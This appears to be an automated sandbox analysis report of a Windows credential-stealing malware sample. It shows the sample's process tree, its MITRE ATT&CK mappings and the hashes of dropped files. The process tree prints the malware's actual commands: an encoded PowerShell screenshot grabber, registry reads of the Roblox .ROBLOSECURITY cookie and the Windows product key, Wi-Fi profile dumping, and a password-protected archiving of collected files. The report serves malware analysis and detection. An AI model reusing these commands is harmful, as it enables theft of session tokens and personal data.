      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      PID:1820
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:5100
  - - C:\Windows\SysWOW64\tree.com
      tree /A /F
      4⤵
      System Location Discovery: System Language Discovery
      PID:1624
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Location Discovery: System Language Discovery
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:2828
  - - C:\Windows\SysWOW64\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Location Discovery: System Language Discovery
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:4800
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:868
  - - C:\Windows\SysWOW64\systeminfo.exe
      systeminfo
      4⤵
      System Location Discovery: System Language Discovery
      Gathers system information
      PID:4524
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2204
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3852
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\5uegiqhn\5uegiqhn.cmdline"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1584
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9B17.tmp" "c:\Users\Admin\AppData\Local\Temp\5uegiqhn\CSCA5D1517286A94B9CA525A03322C103F.TMP"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:2828
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4792
  - - C:\Windows\SysWOW64\tree.com
      tree /A /F
      4⤵
      System Location Discovery: System Language Discovery
      PID:3104
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4980
  - - C:\Windows\SysWOW64\tree.com
      tree /A /F
      4⤵
      System Location Discovery: System Language Discovery
      PID:3908
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4336
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2568
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4480
  - - C:\Windows\SysWOW64\tree.com
      tree /A /F
      4⤵
      System Location Discovery: System Language Discovery
      PID:3456
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4932
  - - C:\Windows\SysWOW64\tree.com
      tree /A /F
      4⤵
      System Location Discovery: System Language Discovery
      PID:1972
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4116
  - - C:\Windows\SysWOW64\tree.com
      tree /A /F
      4⤵
      System Location Discovery: System Language Discovery
      PID:1772
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3484
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2840
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "getmac"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1668
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:1624
  - - C:\Windows\SysWOW64\getmac.exe
      getmac
      4⤵
      System Location Discovery: System Language Discovery
      PID:2024
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI48362\rar.exe a -r -hp"y" "C:\Users\Admin\AppData\Local\Temp\k211R.zip" *"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3976
  - - C:\Users\Admin\AppData\Local\Temp\_MEI48362\rar.exe
      C:\Users\Admin\AppData\Local\Temp\_MEI48362\rar.exe a -r -hp"y" "C:\Users\Admin\AppData\Local\Temp\k211R.zip" *
      4⤵
      Executes dropped EXE
      PID:3876
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic os get Caption"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1316
  - - C:\Windows\SysWOW64\Wbem\WMIC.exe
      wmic os get Caption
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      PID:1936
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3644
  - - C:\Windows\SysWOW64\Wbem\WMIC.exe
      wmic computersystem get totalphysicalmemory
      4⤵
      System Location Discovery: System Language Discovery
      PID:3804
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3332
  - - C:\Windows\SysWOW64\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      System Location Discovery: System Language Discovery
      PID:1680
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2428
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:4780
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1820
  - - C:\Windows\SysWOW64\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      System Location Discovery: System Language Discovery
      Detects videocard installed
      PID:3924
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1736
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:2716

C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
1⤵
PID:2568

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Process Discovery

T1057

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Wi-Fi Discovery

T1016.002

Lateral Movement

Collection

Clipboard Data

T1115

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
bdf103ecadf2098f1a4af55b65cd072a

SHA1
cd0c398d2c35946a65653d8f5be64681dff0ac96

SHA256
3026e82835ee98106040a6da7252950f518e6fb3449bfd2293d7f9abbb19918a

SHA512
ef8ec609de440269cb7597041b3df164a7d83141b038003f26b782de53c0a0de4b985576c862d7a637a6b3d8201267c45c22d726b1d76fd66793a211b81463c6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
15KB

MD5
f2d53f641e70906bff42fe4109b4e22e

SHA1
de52288a4b1ae570a0effb8d343f5625107637cd

SHA256
b8357e717cec7f91fa44959b3a78a4b2b675030be41f1e728574895913d2345b

SHA512
e7042f2dcc0df3987963ba28cbffb1a7e79ffbce9bb6d82570e6a25d3612355aec78850604b517b605b79a4bd03f9fc064ad8d7865eca806a6326300ca6532cb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
7cd4b286cba2619d6367fbbd6e053627

SHA1
da5a5169178ad6d27836a3f7512f249198ec6187

SHA256
a9efd2c3a991a76ec0e59129cdff92113fda22f0304da44e3351a7438d190e11

SHA512
5c716532cd8c80f6c927b769f8c43e8f9838d06fea9198298e56837efa569105ca49626dc38c183ac9eab9e7a8b31b8799d31f9a96fc3661f69ddcdc875e878d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
1979edd3f4f33341ae0390e42b26a68f

SHA1
2bdebccbec4983c291e7c5eeadf4b103fa73552e

SHA256
447a290f813c1982cf07d068febd4c7040d0e2bab4b57a7e0016ac818d8578c4

SHA512
bfc238b65171dc4abb6a80999166f49185dcea0ed26cec5c0e10c6f82ef99489bc317e0e9ab1c7da71ff4ce86b6d0dc637d5a7f99dcec6dabb539e49f8c27fc4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
3211aef91cd8d10caf2acc1449fc4116

SHA1
eeb3908a3efdec5d920250e9ba6c3bab094e1a56

SHA256
73bbdab3690d1cb877b821525cbc948f6b3d5434db3b64d5df1c26b18e66d145

SHA512
1ebdef15592ff439a5beebad8d696dbede24093555627b31070a9b2ffa9c1addcbb3e32863ec190de478ecd36e5f75eca373c975c44c20d67400f2dd50236b1c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
636bcc1be3a561a2817c0a84574455dd

SHA1
2a26b57b351e2d50f6de4541ff827c285bda024c

SHA256
c77cf6dc715e951d5574157ccf4e0e0f01b190d7e0b822ce6d9f3a2e6579c3dd

SHA512
66020a232f7a7681cd80a21a872974f778a8898ab0540f29d66eecfe34e857d0d5d46bc220a0567c60446440f04b666e328897944aa1065c7e8b6c611df68dad

Download Submit
C:\Users\Admin\AppData\Local\Temp\5uegiqhn\5uegiqhn.dll

Filesize
4KB

MD5
b14719411b9bfddd7d4b02be8761c99e

SHA1
3867dc05d5c74a5a2c62c14a98c609756a17305f

SHA256
baf0f73da766f952e11380aa76b332b27b3c99ec87310baee411f3d7ca0e4ce1

SHA512
fe50c26d70528cd6db09733169fb29214f3fe95cc568f3864cf13862ad4f4d7868080025624115ed065edbbd2b229cbfbaa0b291ac680a9c4075fdda0d726561

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES9B17.tmp

Filesize
1KB

MD5
03ad1d6bb67fb021d818e0e7a369a256

SHA1
c178aa364f3e3d82beefdb0b9962f4ebf9bbb140

SHA256
bf496e8510d38e7ec01291bd16d918e501b75243904352766d0f71d07a062916

SHA512
c4c6b340d936a6e6f554f366068c4ad3aca4bc98c04d3f99868fbd663a63b201621e2a6cdcb49676043ab72791dc024585ffdb9916c94c6d5cc248be9b1ef728

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI48362\VCRUNTIME140.dll

Filesize
88KB

MD5
a0df29af5f6135b735dee359c0871ecf

SHA1
f7ebb9a9fd00e1ac95537158fae1167b06f490bd

SHA256
35afadbacc9a30341c1a5ee2117e69583e5044cea0bfab636dccbdcc281a8786

SHA512
fdc7a62d0b187829708ec544de52b4037da613e01a7591a2abc55f95c4719ee04f9c51d31f01edb7161b5edc3cd85004c3a55d375116baa76fb44553df592b3e

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI48362\_bz2.pyd

Filesize
44KB

MD5
04006baa3fdda07ad06790c814130025

SHA1
7ae71d19d31a38fa4cd06f38b1780176e9837747

SHA256
65345e9fb47a8e07135a8df71690966756fb3a16601ea76e1c37cb5a85687959

SHA512
0c1b27e18455bd966df67b719507afa9b83b0a134b985361efa13dd6001c37dc48a8c119847215235c0f8e47c6c3bc2fb2be8b5854f51368dc28f4f2df36830a

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI48362\_ctypes.pyd

Filesize
52KB

MD5
e6f488f9ef063cec266cb03ecde771e9

SHA1
8f9b7780df25867599cf92f42ad7dab5cc37c60b

SHA256
1ea6ecb02632b85e278a4a74d5560662b6a9652ee8c03214139a00935abd4d3f

SHA512
47d57e082e1e172612efb364d44a407fb3dafb4efc6de02585f62bc65d39b57f233a0cdd9b3c2bd0539288b08176bd165cc1290319e861c35f5c3c877a930156

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI48362\_decimal.pyd

Filesize
79KB

MD5
e70eb2dff120e954a305c37d1ff6c19b

SHA1
246618204685a5e1d30f4a3d18a298441c65df8f

SHA256
ecbf5f140349137a46609bfb625572907deb211005c4cc0eca6875770af47f25

SHA512
15bbdad7358da39e2348986dd96f19c88d8bad83c3de0cf14b3d22205ba9c4cf0beb09d7dbaebe65af5b532b343c1336596e3754606a409c3e6f56ca0d29d3c4

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI48362\_hashlib.pyd

Filesize
30KB

MD5
afd1f13811e21a9a303d633cc3081d18

SHA1
d9736b444a27b0d3a13bc95d579445f9e72af99a

SHA256
052edf9eb0742063050ddb59810c34c7d640748ed760408299b6821e095922c8

SHA512
4a76a4c52f2983ea7f141343d08e32b11fc499c87282e44bd77ef50259f544e8212db235ef9cd541337fdc8fb872f34f58be3a343e7c70b29a822e3f2363e934

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI48362\_lzma.pyd

Filesize
79KB

MD5
9f4917705676062bebc879968a0d24d1

SHA1
751d9e6dae9e43eba719b36875ed89801cc1f07e

SHA256
11fc0bbe22dcdba2f4952eb38ab31447833d52c624d97253ae08a77ff65415b2

SHA512
